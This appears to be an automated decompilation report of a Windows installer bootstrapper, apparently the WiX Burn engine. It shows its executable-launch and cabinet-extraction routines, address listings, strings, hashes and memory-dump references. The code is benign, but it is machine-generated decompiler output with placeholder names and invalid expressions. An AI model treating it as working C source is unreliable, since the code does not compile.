														_t225 = E00431FB6(_t239, _v588.hProcess, 0x1f4,  &_v544);
														__eflags = _t225 - 0x80070102;
													} while (_t225 == 0x80070102);
													__eflags = _t225;
													if(_t225 < 0) {
														_push(_v532);
														_push("Failed to wait for executable to complete: %ls");
														goto L54;
													}
													L50:
													_t225 = E00419479( *((intOrPtr*)(_t247 + 8)), _v544, _v592);
													__eflags = _t225;
													if(_t225 >= 0) {
														goto L55;
													}
													E004300D9(_t189, "exeengine.cpp", 0x21b, _t225);
													_push(_v544);
													_push("Process returned error: 0x%x");
													goto L54;
												}
												WaitForInputIdle(_v588, 0x1388);
												goto L55;
											} else {
												_t194 = GetLastError();
												__eflags = _t194;
												_t232 =  <=  ? _t194 : _t194 & 0x0000ffff | 0x80070000;
												__eflags = _t232;
												_t225 =  >=  ? 0x80004005 : _t232;
												E004300D9(0x80004005, "exeengine.cpp", 0x200, _t225);
												_push(_v532);
												_push("Failed to CreateProcess on path: %ls");
												L54:
												_push(_t225);
												E00430A57();
												L55:
												__eflags = _v568;
												if(_v568 != 0) {
													SetCurrentDirectoryW( &_v528);
												}
												goto L57;
											}
										}
										__eflags =  *((intOrPtr*)( *((intOrPtr*)(_t247 + 8)) + 0xac)) - 1;
										if(__eflags != 0) {
											__eflags = _t239;
											if(_t239 != 0) {
												goto L40;
											}
											__eflags =  *((intOrPtr*)( *((intOrPtr*)(_t247 + 8)) + 0xac)) - 2;
											if(__eflags != 0) {
												goto L40;
											}
											_t225 = E00424C63(_t239, _t242, __eflags, _v532, _v536, _v560, _v564,  &_v544);
											__eflags = _t225;
											if(_t225 >= 0) {
												goto L50;
											}
											_push(_v532);
											_push("Failed to run netfx chainer: %ls");
											L2:
											_push(_t225);
											E00430A57();
											goto L57;
										}
										_t225 = E00424468(_t239, _t242, __eflags, _v532, _v536, _v560, _v564,  &_v544);
										__eflags = _t225;
										if(_t225 >= 0) {
											goto L50;
										}
										_push(_v532);
										_push("Failed to run bundle as embedded from path: %ls");
										goto L2;
									}
									_t205 =  *((intOrPtr*)(_t247 + 8));
									__eflags =  *((intOrPtr*)(_t205 + 0xac)) - 1;
									if( *((intOrPtr*)(_t205 + 0xac)) != 1) {
										goto L32;
									}
									_push( *(_t247 + 0x14));
									_t246 = L"burn.ignoredependencies";
									_push(_t246);
									_t225 = E00433CEA( &_v536, L"%ls -%ls=%ls", _v536);
									_t256 = _t253 + 0x14;
									__eflags = _t225;
									if(_t225 >= 0) {
										_push( *(_t247 + 0x14));
										_push(_t246);
										_t225 = E00433CEA( &_v540, L"%ls -%ls=%ls", _v540);
										_t253 = _t256 + 0x14;
										__eflags = _t225;
										if(_t225 >= 0) {
											goto L32;
										}
										_push("Failed to append the list of dependencies to ignore to the obfuscated command line.");
										goto L5;
									}
									_push("Failed to append the list of dependencies to ignore to the command line.");
									goto L5;
								}
								_push("Failed to create obfuscated executable command.");
								goto L5;
							}
							__eflags =  *_t246;
							if( *_t246 == 0) {
								goto L22;
							}
							_t225 = E00403A92(_v572, _t246,  &_v556, 0);
							__eflags = _t225;
							if(_t225 >= 0) {
								_push(_v556);
								_t225 = E00433CEA( &_v536, L"\"%ls\" %s", _v532);
								_t257 = _t251 + 0x10;
								__eflags = _t225;
								if(_t225 >= 0) {
									_t225 = E00403AAC(_v572, _t246,  &_v552, 0);
									__eflags = _t225;
									if(_t225 >= 0) {
										_push(_v552);
										_t171 = E00433CEA( &_v540, L"\"%ls\" %s", _v532);
										_t253 = _t257 + 0x10;
										goto L24;
									}
									_push("Failed to format obfuscated argument string.");
									goto L5;
								}
								goto L18;
							}
							_push("Failed to format argument string.");
							goto L5;
						}
						_t218 = _t155 - 1;
						__eflags = _t218;
						if(_t218 == 0) {
							_t246 =  *( *((intOrPtr*)(_t247 + 8)) + 0x94);
							goto L13;
						}
						__eflags = _t218 == 3;
						if(_t218 == 3) {
							_t246 =  *( *((intOrPtr*)(_t247 + 8)) + 0x98);
							goto L13;
						}
						_t225 = 0x8000ffff;
						_push("Failed to get action arguments for executable package.");
						goto L5;
					}
					_push("Failed to build executable path.");
					goto L5;
				}
				_push( *((intOrPtr*)( *((intOrPtr*)(_t247 + 8)))));
				_push("Failed to get cached path for package: %ls");
				goto L2;
			}

















































                                                                                                                                                                  0x004195ac
                                                                                                                                                                  0x004195b5
                                                                                                                                                                  0x004195bc
                                                                                                                                                                  0x004195c2
                                                                                                                                                                  0x004195cb
                                                                                                                                                                  0x004195d6
                                                                                                                                                                  0x004195d9
                                                                                                                                                                  0x004195e3
                                                                                                                                                                  0x004195ec
                                                                                                                                                                  0x004195f1
                                                                                                                                                                  0x004195ff
                                                                                                                                                                  0x00419600
                                                                                                                                                                  0x00419601
                                                                                                                                                                  0x00419606
                                                                                                                                                                  0x0041960e
                                                                                                                                                                  0x0041960f
                                                                                                                                                                  0x00419610
                                                                                                                                                                  0x00419616
                                                                                                                                                                  0x0041961c
                                                                                                                                                                  0x00419622
                                                                                                                                                                  0x00419628
                                                                                                                                                                  0x0041962e
                                                                                                                                                                  0x00419634
                                                                                                                                                                  0x0041963a
                                                                                                                                                                  0x00419647
                                                                                                                                                                  0x00419648
                                                                                                                                                                  0x00419649
                                                                                                                                                                  0x0041964a
                                                                                                                                                                  0x00419653
                                                                                                                                                                  0x00419654
                                                                                                                                                                  0x00419655
                                                                                                                                                                  0x00419656
                                                                                                                                                                  0x00419659
                                                                                                                                                                  0x00419664
                                                                                                                                                                  0x00419679
                                                                                                                                                                  0x004196b0
                                                                                                                                                                  0x004196b2
                                                                                                                                                                  0x004196b4
                                                                                                                                                                  0x004196cb
                                                                                                                                                                  0x004196cb
                                                                                                                                                                  0x004196cc
                                                                                                                                                                  0x004196fb
                                                                                                                                                                  0x00419701
                                                                                                                                                                  0x00419701
                                                                                                                                                                  0x00419703
                                                                                                                                                                  0x004197ac
                                                                                                                                                                  0x004197b2
                                                                                                                                                                  0x004197c4
                                                                                                                                                                  0x004197c6
                                                                                                                                                                  0x004197c9
                                                                                                                                                                  0x004197cb
                                                                                                                                                                  0x0041975b
                                                                                                                                                                  0x0041975b
                                                                                                                                                                  0x004196bb
                                                                                                                                                                  0x004196bb
                                                                                                                                                                  0x004196bc
                                                                                                                                                                  0x00419ae3
                                                                                                                                                                  0x00419aea
                                                                                                                                                                  0x00419af2
                                                                                                                                                                  0x00419af2
                                                                                                                                                                  0x00419afe
                                                                                                                                                                  0x00419b06
                                                                                                                                                                  0x00419b06
                                                                                                                                                                  0x00419b12
                                                                                                                                                                  0x00419b1a
                                                                                                                                                                  0x00419b1a
                                                                                                                                                                  0x00419b26
                                                                                                                                                                  0x00419b2e
                                                                                                                                                                  0x00419b2e
                                                                                                                                                                  0x00419b3a
                                                                                                                                                                  0x00419b42
                                                                                                                                                                  0x00419b42
                                                                                                                                                                  0x00419b4e
                                                                                                                                                                  0x00419b56
                                                                                                                                                                  0x00419b56
                                                                                                                                                                  0x00419b62
                                                                                                                                                                  0x00419b68
                                                                                                                                                                  0x00419b70
                                                                                                                                                                  0x00419b72
                                                                                                                                                                  0x00419b72
                                                                                                                                                                  0x00419b80
                                                                                                                                                                  0x00419b88
                                                                                                                                                                  0x00419b88
                                                                                                                                                                  0x00419b9a
                                                                                                                                                                  0x00419b9a
                                                                                                                                                                  0x004197db
                                                                                                                                                                  0x004197e0
                                                                                                                                                                  0x004197e3
                                                                                                                                                                  0x004197e3
                                                                                                                                                                  0x004197e5
                                                                                                                                                                  0x004197e7
                                                                                                                                                                  0x004197f3
                                                                                                                                                                  0x004197f7
                                                                                                                                                                  0x00419866
                                                                                                                                                                  0x00419866
                                                                                                                                                                  0x0041986c
                                                                                                                                                                  0x0041987a
                                                                                                                                                                  0x0041987e
                                                                                                                                                                  0x00419893
                                                                                                                                                                  0x00419898
                                                                                                                                                                  0x0041989b
                                                                                                                                                                  0x004198a1
                                                                                                                                                                  0x004198a4
                                                                                                                                                                  0x004198a6
                                                                                                                                                                  0x00419944
                                                                                                                                                                  0x00419950
                                                                                                                                                                  0x00419956
                                                                                                                                                                  0x00419958
                                                                                                                                                                  0x00419962
                                                                                                                                                                  0x00419962
                                                                                                                                                                  0x00419988
                                                                                                                                                                  0x00419998
                                                                                                                                                                  0x0041999e
                                                                                                                                                                  0x004199a0
                                                                                                                                                                  0x004199e0
                                                                                                                                                                  0x004199e4
                                                                                                                                                                  0x004199fc
                                                                                                                                                                  0x00419a0c
                                                                                                                                                                  0x00419a16
                                                                                                                                                                  0x00419a1c
                                                                                                                                                                  0x00419a26
                                                                                                                                                                  0x00419a2c
                                                                                                                                                                  0x00419a2e
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x00419a30
                                                                                                                                                                  0x00419a32
                                                                                                                                                                  0x00419a92
                                                                                                                                                                  0x00419a98
                                                                                                                                                                  0x00419aa9
                                                                                                                                                                  0x00419aae
                                                                                                                                                                  0x00419ab3
                                                                                                                                                                  0x00419ab4
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x00419aba
                                                                                                                                                                  0x00419a34
                                                                                                                                                                  0x00419a4b
                                                                                                                                                                  0x00419a4d
                                                                                                                                                                  0x00419a4d
                                                                                                                                                                  0x00419a55
                                                                                                                                                                  0x00419a57
                                                                                                                                                                  0x00419abd
                                                                                                                                                                  0x00419ac3
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x00419ac3
                                                                                                                                                                  0x00419a59
                                                                                                                                                                  0x00419a6d
                                                                                                                                                                  0x00419a6f
                                                                                                                                                                  0x00419a71
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x00419a7e
                                                                                                                                                                  0x00419a83
                                                                                                                                                                  0x00419a89
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x00419a89
                                                                                                                                                                  0x004199f1
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x004199a2
                                                                                                                                                                  0x004199a2
                                                                                                                                                                  0x004199b1
                                                                                                                                                                  0x004199b3
                                                                                                                                                                  0x004199bb
                                                                                                                                                                  0x004199bd
                                                                                                                                                                  0x004199cb
                                                                                                                                                                  0x004199d0
                                                                                                                                                                  0x004199d6
                                                                                                                                                                  0x00419ac8
                                                                                                                                                                  0x00419ac8
                                                                                                                                                                  0x00419ac9
                                                                                                                                                                  0x00419ad1
                                                                                                                                                                  0x00419ad1
                                                                                                                                                                  0x00419ad8
                                                                                                                                                                  0x00419ae1
                                                                                                                                                                  0x00419ae1
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x00419ad8
                                                                                                                                                                  0x004199a0
                                                                                                                                                                  0x004198af
                                                                                                                                                                  0x004198b6
                                                                                                                                                                  0x004198f6
                                                                                                                                                                  0x004198f8
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x004198fd
                                                                                                                                                                  0x00419904
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x0041992a
                                                                                                                                                                  0x0041992c
                                                                                                                                                                  0x0041992e
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x00419934
                                                                                                                                                                  0x0041993a
                                                                                                                                                                  0x00419685
                                                                                                                                                                  0x00419685
                                                                                                                                                                  0x00419686
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x0041968b
                                                                                                                                                                  0x004198dc
                                                                                                                                                                  0x004198de
                                                                                                                                                                  0x004198e0
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x004198e6
                                                                                                                                                                  0x004198ec
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x004198ec
                                                                                                                                                                  0x004197f9
                                                                                                                                                                  0x004197fc
                                                                                                                                                                  0x00419803
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x00419805
                                                                                                                                                                  0x00419808
                                                                                                                                                                  0x0041980d
                                                                                                                                                                  0x00419825
                                                                                                                                                                  0x00419827
                                                                                                                                                                  0x0041982a
                                                                                                                                                                  0x0041982c
                                                                                                                                                                  0x00419838
                                                                                                                                                                  0x00419841
                                                                                                                                                                  0x00419853
                                                                                                                                                                  0x00419855
                                                                                                                                                                  0x00419858
                                                                                                                                                                  0x0041985a
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x0041985c
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x0041985c
                                                                                                                                                                  0x0041982e
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x0041982e
                                                                                                                                                                  0x004197e9
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x004197e9
                                                                                                                                                                  0x0041970b
                                                                                                                                                                  0x0041970e
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x00419728
                                                                                                                                                                  0x0041972a
                                                                                                                                                                  0x0041972c
                                                                                                                                                                  0x00419735
                                                                                                                                                                  0x00419752
                                                                                                                                                                  0x00419754
                                                                                                                                                                  0x00419757
                                                                                                                                                                  0x00419759
                                                                                                                                                                  0x0041977a
                                                                                                                                                                  0x0041977c
                                                                                                                                                                  0x0041977e
                                                                                                                                                                  0x0041978a
                                                                                                                                                                  0x004197a2
                                                                                                                                                                  0x004197a7
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x004197a7
                                                                                                                                                                  0x00419780
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x00419780
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x00419759
                                                                                                                                                                  0x0041972e
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x0041972e
                                                                                                                                                                  0x004196ce
                                                                                                                                                                  0x004196ce
                                                                                                                                                                  0x004196cf
                                                                                                                                                                  0x004196f0
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x004196f0
                                                                                                                                                                  0x004196d1
                                                                                                                                                                  0x004196d4
                                                                                                                                                                  0x004196e5
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x004196e5
                                                                                                                                                                  0x004196d6
                                                                                                                                                                  0x004196db
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x004196db
                                                                                                                                                                  0x004196b6
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x004196b6
                                                                                                                                                                  0x0041967e
                                                                                                                                                                  0x00419680
                                                                                                                                                                  0x00000000

                                                                                                                                                                  APIs
                                                                                                                                                                  • CloseHandle.KERNEL32(00000000,?,?,?,?,?,?,00000000,00000000,00000000), ref: 00419B70
                                                                                                                                                                  • CloseHandle.KERNEL32(00000000,?,?,?,?,?,?,00000000,00000000,00000000), ref: 00419B88
                                                                                                                                                                  Strings
                                                                                                                                                                  • Failed to append the list of dependencies to ignore to the obfuscated command line., xrefs: 0041985C
                                                                                                                                                                  • Failed to wait for executable to complete: %ls, xrefs: 00419AC3
                                                                                                                                                                  • %ls -%ls=%ls, xrefs: 0041981A, 00419848
                                                                                                                                                                  • Bootstrapper application aborted during EXE progress., xrefs: 00419AAE
                                                                                                                                                                  • Failed to run bundle as embedded from path: %ls, xrefs: 004198EC
                                                                                                                                                                  • Failed to get cached path for package: %ls, xrefs: 00419680
                                                                                                                                                                  • exeengine.cpp, xrefs: 004199C6, 00419A79, 00419AA4
                                                                                                                                                                  • Failed to format argument string., xrefs: 0041972E
                                                                                                                                                                  • Failed to build executable path., xrefs: 004196B6
                                                                                                                                                                  • "%ls" %s, xrefs: 00419747, 0041979C
                                                                                                                                                                  • "%ls", xrefs: 004197B2, 004197BD, 004197D9
                                                                                                                                                                  • Failed to create obfuscated executable command., xrefs: 004197E9
                                                                                                                                                                  • D, xrefs: 00419988
                                                                                                                                                                  • Failed to create executable command., xrefs: 0041975B
                                                                                                                                                                  • Failed to CreateProcess on path: %ls, xrefs: 004199D6
                                                                                                                                                                  • Failed to get action arguments for executable package., xrefs: 004196DB
                                                                                                                                                                  • Failed to run netfx chainer: %ls, xrefs: 0041993A
                                                                                                                                                                  • Failed to format obfuscated argument string., xrefs: 00419780
                                                                                                                                                                  • Failed to append the list of dependencies to ignore to the command line., xrefs: 0041982E
                                                                                                                                                                  • 2, xrefs: 00419A1C
                                                                                                                                                                  • burn.ignoredependencies, xrefs: 00419808, 0041980D, 00419841
                                                                                                                                                                  • Process returned error: 0x%x, xrefs: 00419A89
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000000.00000002.255488985.0000000000401000.00000080.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                  • Associated: 00000000.00000002.255471614.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                                                                  • Associated: 00000000.00000002.256374653.0000000000427000.00000040.00020000.sdmp Download File
                                                                                                                                                                  • Associated: 00000000.00000002.256545154.0000000000429000.00000080.00020000.sdmp Download File
                                                                                                                                                                  • Associated: 00000000.00000002.256755399.000000000043B000.00000002.00020000.sdmp Download File
                                                                                                                                                                  • Associated: 00000000.00000002.257304277.0000000000456000.00000004.00020000.sdmp Download File
                                                                                                                                                                  • Associated: 00000000.00000002.257317891.000000000045C000.00000002.00020000.sdmp Download File
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: CloseHandle
                                                                                                                                                                  • String ID: "%ls"$"%ls" %s$%ls -%ls=%ls$2$Bootstrapper application aborted during EXE progress.$D$Failed to CreateProcess on path: %ls$Failed to append the list of dependencies to ignore to the command line.$Failed to append the list of dependencies to ignore to the obfuscated command line.$Failed to build executable path.$Failed to create executable command.$Failed to create obfuscated executable command.$Failed to format argument string.$Failed to format obfuscated argument string.$Failed to get action arguments for executable package.$Failed to get cached path for package: %ls$Failed to run bundle as embedded from path: %ls$Failed to run netfx chainer: %ls$Failed to wait for executable to complete: %ls$Process returned error: 0x%x$burn.ignoredependencies$exeengine.cpp
                                                                                                                                                                  • API String ID: 2962429428-3604779160
                                                                                                                                                                  • Opcode ID: 17993fef16c5d2262b34bd92aae31596d0bf423cd7bcc08e7cdd81dbc2c627f2
                                                                                                                                                                  • Instruction ID: abcb6209c858659c698c53d966455489224d57c8bea437be5af14e067fcfc682
                                                                                                                                                                  • Opcode Fuzzy Hash: 17993fef16c5d2262b34bd92aae31596d0bf423cd7bcc08e7cdd81dbc2c627f2
                                                                                                                                                                  • Instruction Fuzzy Hash: 60F1A171A40219AFDF21AF95CC99FDAB7B4BF18304F1000EAE509A2161DB799EC4DF19
                                                                                                                                                                  Uniqueness

                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                  Function 004236DC, Relevance: 54.5, APIs: 20, Strings: 11, Instructions: 287synchronizationCOMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  C-Code - Quality: 55%
                                                                                                                                                                  			E004236DC(void* __ecx, union _LARGE_INTEGER* __edx, intOrPtr _a4, union _LARGE_INTEGER* _a8) {
				union _LARGE_INTEGER* _v8;
				union _LARGE_INTEGER _v12;
				int _t30;
				void* _t34;
				intOrPtr _t42;
				void* _t50;
				signed short _t52;
				signed short _t56;
				signed short _t59;
				signed short _t62;
				void* _t66;
				intOrPtr _t68;
				void* _t72;
				signed short _t76;
				void* _t77;
				signed short _t79;
				void* _t80;
				signed short _t82;
				void* _t83;
				signed short _t86;
				signed short _t87;
				signed short _t88;
				signed int _t89;
				long _t90;
				signed int _t93;
				void* _t95;
				union _LARGE_INTEGER* _t98;
				intOrPtr _t100;
				signed int _t103;

				_t98 = __edx;
				_push(_t89);
				_t100 = _a4;
				_t30 = SetEvent( *(_t100 + 0x28));
				_t90 = _t89 | 0xffffffff;
				if(_t30 != 0) {
					if(WaitForSingleObject( *(_t100 + 0x24), _t90) != _t90) {
						if(ResetEvent( *(_t100 + 0x24)) != 0) {
							_t34 =  *((intOrPtr*)(_t100 + 0x2c)) - 1;
							if(_t34 == 0) {
								_t103 = E00434004(_t98,  *((intOrPtr*)(_t100 + 0x34)), _a8->LowPart.HighPart, 0, 0xfde9);
								if(_t103 >= 0) {
									if(SetEvent( *(_t100 + 0x28)) != 0) {
										if(WaitForSingleObject( *(_t100 + 0x24), _t90) != _t90) {
											if(ResetEvent( *(_t100 + 0x24)) != 0) {
												_t42 =  *((intOrPtr*)(_t100 + 0x2c));
												if(_t42 == 0) {
													_t95 = CreateFileW( *(_t100 + 0x38), 0x40000000, 1, 0, 2, 0x80, 0);
													 *(_t100 + 0x3c) = _t95;
													if(_t95 != _t90) {
														_push(0);
														asm("cdq");
														if(SetFilePointerEx(_t95,  *_a8, _t98, 0) != 0) {
															if(SetEndOfFile( *(_t100 + 0x3c)) != 0) {
																_push(0);
																asm("xorps xmm0, xmm0");
																asm("movlpd [ebp-0x8], xmm0");
																if(SetFilePointerEx( *(_t100 + 0x3c), _v12, _v8, 0) == 0) {
																	_t52 = GetLastError();
																	_t107 =  <=  ? _t52 : _t52 & 0x0000ffff | 0x80070000;
																	_t103 =  >=  ? 0x80004005 :  <=  ? _t52 : _t52 & 0x0000ffff | 0x80070000;
																	E004300D9(0x80004005, "cabextract.cpp", 0x25a, _t103);
																	_push("Failed to set file pointer to beginning of file.");
																	goto L40;
																}
															} else {
																_t56 = GetLastError();
																_t110 =  <=  ? _t56 : _t56 & 0x0000ffff | 0x80070000;
																_t103 =  >=  ? 0x80004005 :  <=  ? _t56 : _t56 & 0x0000ffff | 0x80070000;
																E004300D9(0x80004005, "cabextract.cpp", 0x254, _t103);
																_push("Failed to set end of file.");
																goto L40;
															}
														} else {
															_t59 = GetLastError();
															_t113 =  <=  ? _t59 : _t59 & 0x0000ffff | 0x80070000;
															_t103 =  >=  ? 0x80004005 :  <=  ? _t59 : _t59 & 0x0000ffff | 0x80070000;
															E004300D9(0x80004005, "cabextract.cpp", 0x24f, _t103);
															_push("Failed to set file pointer to end of file.");
															goto L40;
														}
													} else {
														_t62 = GetLastError();
														_t116 =  <=  ? _t62 : _t62 & 0x0000ffff | 0x80070000;
														_t103 =  >=  ? 0x80004005 :  <=  ? _t62 : _t62 & 0x0000ffff | 0x80070000;
														E004300D9(0x80004005, "cabextract.cpp", 0x248, _t103);
														_push( *(_t100 + 0x38));
														_push("Failed to create file: %ls");
														goto L16;
													}
													goto L42;
												} else {
													_t66 = _t42 - 1;
													if(_t66 == 0) {
														_t68 = E00431078( *_a8, 1);
														 *((intOrPtr*)(_t100 + 0x40)) = _t68;
														if(_t68 != 0) {
															 *(_t100 + 0x48) =  *(_t100 + 0x48) & 0x00000000;
															 *(_t100 + 0x44) =  *_a8;
														} else {
															_t103 = 0x8007000e;
															E004300D9(_t68, "cabextract.cpp", 0x262, 0x8007000e);
															_push("Failed to allocate buffer for stream.");
															goto L40;
														}
														goto L42;
													} else {
														_t72 = _t66 - 1;
														if(_t72 == 0) {
															_t50 = 0;
														} else {
															_t73 = _t72 == 1;
															if(_t72 == 1) {
																goto L13;
															} else {
																_t93 = 0x8007139f;
																_push(0x8007139f);
																_push(0x273);
																goto L12;
															}
															goto L42;
														}
													}
												}
											} else {
												_t76 = GetLastError();
												_t119 =  <=  ? _t76 : _t76 & 0x0000ffff | 0x80070000;
												_t77 = 0x80004005;
												_t103 =  >=  ? 0x80004005 :  <=  ? _t76 : _t76 & 0x0000ffff | 0x80070000;
												_push(_t103);
												_push(0x23d);
												goto L8;
											}
										} else {
											_t79 = GetLastError();
											_t122 =  <=  ? _t79 : _t79 & 0x0000ffff | 0x80070000;
											_t80 = 0x80004005;
											_t103 =  >=  ? 0x80004005 :  <=  ? _t79 : _t79 & 0x0000ffff | 0x80070000;
											_push(_t103);
											_push(0x238);
											goto L5;
										}
									} else {
										_t82 = GetLastError();
										_t125 =  <=  ? _t82 : _t82 & 0x0000ffff | 0x80070000;
										_t83 = 0x80004005;
										_t103 =  >=  ? 0x80004005 :  <=  ? _t82 : _t82 & 0x0000ffff | 0x80070000;
										_push(_t103);
										_push(0x232);
										goto L2;
									}
								} else {
									_push(_a8->LowPart.HighPart);
									_push("Failed to copy stream name: %ls");
									L16:
									_push(_t103);
									E00430A57();
									goto L42;
								}
							} else {
								_t73 = _t34 == 4;
								if(_t34 == 4) {
									L13:
									_t103 = 0x80004004;
								} else {
									_t93 = 0x8007139f;
									_push(0x8007139f);
									_push(0x228);
									L12:
									_t103 = _t93;
									E004300D9(_t73);
									E00430A57(_t93, "Invalid operation for this state.", "cabextract.cpp");
									_t90 = _t93 | 0xffffffff;
									goto L41;
								}
								goto L42;
							}
						} else {
							_t86 = GetLastError();
							_t128 =  <=  ? _t86 : _t86 & 0x0000ffff | 0x80070000;
							_t77 = 0x80004005;
							_t103 =  >=  ? 0x80004005 :  <=  ? _t86 : _t86 & 0x0000ffff | 0x80070000;
							_push(_t103);
							_push(0x21a);
							L8:
							_push("cabextract.cpp");
							E004300D9(_t77);
							_push("Failed to reset begin operation event.");
							goto L40;
						}
					} else {
						_t87 = GetLastError();
						_t131 =  <=  ? _t87 : _t87 & 0x0000ffff | 0x80070000;
						_t80 = 0x80004005;
						_t103 =  >=  ? 0x80004005 :  <=  ? _t87 : _t87 & 0x0000ffff | 0x80070000;
						_push(_t103);
						_push(0x215);
						L5:
						_push("cabextract.cpp");
						E004300D9(_t80);
						_push("Failed to wait for begin operation event.");
						goto L40;
					}
				} else {
					_t88 = GetLastError();
					_t134 =  <=  ? _t88 : _t88 & 0x0000ffff | 0x80070000;
					_t83 = 0x80004005;
					_t103 =  >=  ? 0x80004005 :  <=  ? _t88 : _t88 & 0x0000ffff | 0x80070000;
					_push(_t103);
					_push(0x20f);
					L2:
					_push("cabextract.cpp");
					E004300D9(_t83);
					_push("Failed to set operation complete event.");
					L40:
					_push(_t103);
					E00430A57();
					L41:
					L42:
					_t50 = 1;
				}
				 *(_t100 + 0x30) = _t103;
				_t91 =  >=  ? _t50 : _t90;
				_t51 =  >=  ? _t50 : _t90;
				return  >=  ? _t50 : _t90;
			}
































                                                                                                                                                                  0x004236dc
                                                                                                                                                                  0x004236e1
                                                                                                                                                                  0x004236e4
                                                                                                                                                                  0x004236ea
                                                                                                                                                                  0x004236f0
                                                                                                                                                                  0x004236f5
                                                                                                                                                                  0x0042373b
                                                                                                                                                                  0x00423780
                                                                                                                                                                  0x004237bd
                                                                                                                                                                  0x004237be
                                                                                                                                                                  0x0042380e
                                                                                                                                                                  0x00423812
                                                                                                                                                                  0x00423838
                                                                                                                                                                  0x0042386f
                                                                                                                                                                  0x004238a5
                                                                                                                                                                  0x004238d4
                                                                                                                                                                  0x004238d5
                                                                                                                                                                  0x00423959
                                                                                                                                                                  0x0042395b
                                                                                                                                                                  0x00423960
                                                                                                                                                                  0x004239a0
                                                                                                                                                                  0x004239a4
                                                                                                                                                                  0x004239b2
                                                                                                                                                                  0x004239f7
                                                                                                                                                                  0x00423a2e
                                                                                                                                                                  0x00423a32
                                                                                                                                                                  0x00423a35
                                                                                                                                                                  0x00423a4b
                                                                                                                                                                  0x00423a4d
                                                                                                                                                                  0x00423a5e
                                                                                                                                                                  0x00423a68
                                                                                                                                                                  0x00423a76
                                                                                                                                                                  0x00423a7b
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x00423a7b
                                                                                                                                                                  0x004239f9
                                                                                                                                                                  0x004239f9
                                                                                                                                                                  0x00423a0a
                                                                                                                                                                  0x00423a14
                                                                                                                                                                  0x00423a22
                                                                                                                                                                  0x00423a27
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x00423a27
                                                                                                                                                                  0x004239b4
                                                                                                                                                                  0x004239b4
                                                                                                                                                                  0x004239c5
                                                                                                                                                                  0x004239cf
                                                                                                                                                                  0x004239dd
                                                                                                                                                                  0x004239e2
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x004239e2
                                                                                                                                                                  0x00423962
                                                                                                                                                                  0x00423962
                                                                                                                                                                  0x00423973
                                                                                                                                                                  0x0042397d
                                                                                                                                                                  0x0042398b
                                                                                                                                                                  0x00423990
                                                                                                                                                                  0x00423993
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x00423993
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x004238d7
                                                                                                                                                                  0x004238d7
                                                                                                                                                                  0x004238d8
                                                                                                                                                                  0x00423902
                                                                                                                                                                  0x00423907
                                                                                                                                                                  0x0042390c
                                                                                                                                                                  0x00423932
                                                                                                                                                                  0x00423936
                                                                                                                                                                  0x0042390e
                                                                                                                                                                  0x0042390e
                                                                                                                                                                  0x0042391e
                                                                                                                                                                  0x00423923
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x00423923
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x004238da
                                                                                                                                                                  0x004238da
                                                                                                                                                                  0x004238db
                                                                                                                                                                  0x004238f4
                                                                                                                                                                  0x004238dd
                                                                                                                                                                  0x004238dd
                                                                                                                                                                  0x004238de
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x004238e4
                                                                                                                                                                  0x004238e4
                                                                                                                                                                  0x004238e9
                                                                                                                                                                  0x004238ea
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x004238ea
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x004238de
                                                                                                                                                                  0x004238db
                                                                                                                                                                  0x004238d8
                                                                                                                                                                  0x004238a7
                                                                                                                                                                  0x004238a7
                                                                                                                                                                  0x004238b8
                                                                                                                                                                  0x004238bb
                                                                                                                                                                  0x004238c2
                                                                                                                                                                  0x004238c5
                                                                                                                                                                  0x004238c6
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x004238c6
                                                                                                                                                                  0x00423871
                                                                                                                                                                  0x00423871
                                                                                                                                                                  0x00423882
                                                                                                                                                                  0x00423885
                                                                                                                                                                  0x0042388c
                                                                                                                                                                  0x0042388f
                                                                                                                                                                  0x00423890
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x00423890
